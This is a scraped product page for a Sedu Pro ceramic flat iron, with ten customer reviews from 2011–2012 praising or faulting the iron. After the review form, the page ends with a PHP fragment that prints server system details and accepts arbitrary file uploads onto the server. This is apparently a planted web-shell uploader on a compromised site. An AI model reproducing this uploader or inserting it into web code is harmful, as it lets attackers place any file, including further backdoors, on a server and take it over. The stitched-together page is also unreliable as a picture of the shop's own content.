Sunday, April 05, 2020
Welcome to VBS. Lowest Prices GUARANTEED !
Log In

Log In

Forgot Your Password?

Cart Subtotal: CA$0.00

Sedu Pro Ionic Ceramic Tourmaline Flat Iron (1")

Overall

Availability: In stock

Regular Price: CA$159.95

Special Price: CA$129.95

OR

Customer Reviews

Items 1 to 10 of 17 total

per page
Page:
  1. 1
  2. 2
LUHS IT Review by Jabin Fort Wayne, IN
Overall
Idk what to say. Its simply amazing. Long lasting, heats up fast, and healthy for your hair. I research other products, honestly Sedu is the top selling hair tool in the market. Buy it you will never regret it! (Posted on 2/4/12)
AMAZING SEDU Review by Deborah
Overall
Arrived extremely quickly. Came with the Folica Pouch to put the iron in. Could not be happier with this. (Posted on 2/4/12)
SEDU LOVER ! Review by Georgia
Overall
Used a Chi for many years. It never had an on off switch and this is the first iron I've owned that has one. I love it dearly! Works great, came with a folica heat proof pouch which is very useful. Definitely great purchase. (Posted on 1/19/12)
Better then Chi Review by CHANTAL
Overall
Had a Chi but found it didn't get hot enough for my thick hair. Heard lots about the Sedu through online and decided to shell out for one. Best flat iron in the world! (Posted on 1/7/12)
Perfect, couldn't asked for a better iron Review by Sandy P
Overall
LOVE this iron. Much better then the Solia in terms of quality. Worked great on my super thick hair. (Posted on 12/20/11)
GREAT ITEM Review by Humera
Overall
I just got this product n could be happier. Its the best 80 bucks i ever spent!! highly recommend it :). (Posted on 11/24/11)
THE BESTEST ! Review by SUSIE Q
Overall
This is the only flat iron that has given me the results I wanted. I have coarse thick medium length hair with a slight curl or body that is very stubborn. The Sedu gives me straight, soft non-flyaway hair and it stays this way all day even on humid days. It was a total transformation. I would highly recommend this especially if you have hard to tame coarse hair. Pair it with Crack leave in hair cream and you will be amazed! (Posted on 11/24/11)
GREEEEAAAT ! ! Review by L8diva
Overall
I have relaxed 4bc hair about two inches pass my shoulders. Everything I have previously used has made my hair dry out and super frizzy. It was so dry that just brushing it would leave hair all over the floor and sink. I have rarely had straight hair without totally frying the ends as a result I gave up on straight hair and started wearing two strand twist. I purchased this flat iron because the price after discount on the site was too good to pass up and the reviews were over whelming positive. This Sedu heated up very quickly and appeared to maintain constant temperature. I used the iron on 320 with Bio Silk silk therapy. After only one pass my hair was bone straight and bouncy. I didn't experience any of the usual smoke and burning smell or the need for multiple passes I associated with my Chi. My hair felt and smelled great! Usually, after only one day I begin to frizz up again. To my surprise this did not happen. In fact I was caught in a sprinkle rain without an umbrella and only experienced mild frizzing at the roots. I wanted to test how long it would last and two days later my ends are still silky straight and bouncy and my roots are only mildly frizzed. (We've had rain every day.) My hair looks like weave! While I'm not totally converted to daily flat ironing I may try it more often than bi or tri monthly. Thanks VBS for a great tool at a great price. Now if you would offer the Sedu Revolution Pro Tourmaline Ionic 4000i Hair Dryer for half price I would buy it in snap. (Posted on 11/24/11)
Great Iron, Worked on Black Hair! Review by Golden83
Overall
This iron straightened my natural African American hair like a perm. Unfortunately I dropped it a few times and it stopped working about 1yr 1/2 later. It was awesome while it lasted though. Better than CHI (Posted on 10/4/11)
Iron Works Well But Breaks Or Is Defective Review by Vicky C.
Overall
The iron itself works well. The problem I have is that it breaks easily or the wiring is not made well. I've purchased 2 irons. The first one broke so I had to replace. Then the second one broke again. Seems like it's not hitting a wire and the light turns on and off so it will only turn one half to time. At this price I can't afford to keep replacing it. Have switched to a more sturdy and reliable flat iron. I never had problems with the Kqc or Np with breaking and they lasted years. It's unfortunate because the Sedu iron itself works well. (Posted on 10/4/11)

Items 1 to 10 of 17 total

per page
Page:
  1. 1
  2. 2

Write Your Own Review

You're reviewing: Sedu Pro Ionic Ceramic Tourmaline Flat Iron (1")

How do you rate this product? *

  1 star 2 stars 3 stars 4 stars 5 stars
Overall


'.php_uname().'
'; echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES CUK !!!

'; } else { echo 'Upload GAGAL CUK !!!

'; } } ?>